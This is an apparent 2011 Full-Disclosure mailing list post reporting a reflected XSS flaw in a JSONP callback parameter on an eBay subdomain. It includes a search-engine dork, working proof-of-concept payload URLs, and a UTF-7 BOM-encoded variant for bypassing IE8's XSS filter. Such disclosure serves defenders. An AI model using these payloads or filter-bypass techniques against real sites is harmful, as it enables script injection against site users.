[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] ebay.com callback xss vul

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] ebay.com callback xss vul
From: IEhrepus <5up3rh3i@xxxxxxxxx>
Date: Fri, 11 Feb 2011 05:17:57 -0800

"site:ebay.com inurl:callback" on google.com

and get this url:

http://sea.ebay.com/jplocal/campany/getcampnum.php?callback=?

then
http://sea.ebay.com/jplocal/campany/getcampnum.php?callback=?xxxx%3Cimg%20src=1%20onerror=alert(1)%3E

ofcourse u can use 《xss attacks through utf7-BOM string
injection<http://seclists.org/fulldisclosure/2011/Feb/199>》
to bypass ie8 xss filters

http://sea.ebay.com/jplocal/campany/getcampnum.php?callback=%2B%2Fv811..%2BADwAaAB0AG0APgA8AGIAbwBkAHkAPgA8AHMAYwByAGkAcAB0AD4AYQBsAGUAcgB0ACgAMQApADsAPAAvAHMAYwByAGkAcAB0AD4APAAvAGIAbwBkAHkAPgA8AC8AaAB0AG0APg-xcsxxadas



--superhei from http://www.80vul.com

--ad--
About Ph4nt0m Webzine

Ph4nt0m Webzine is a free network Security Magazine,We accept articles in
English and Chinese, you are welcome contributions
.mailto:root_at_ph4nt0m.org <root_at_ph4nt0m.org> pls.thank you!

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: [Full-disclosure] Multiple vulnerabilities in Firebook
Next by Date: [Full-disclosure] Pen-Testing Companies in Quebec
Previous by thread: [Full-disclosure] Multiple vulnerabilities in Firebook
Next by thread: [Full-disclosure] Pen-Testing Companies in Quebec
Index(es):
- Date
- Thread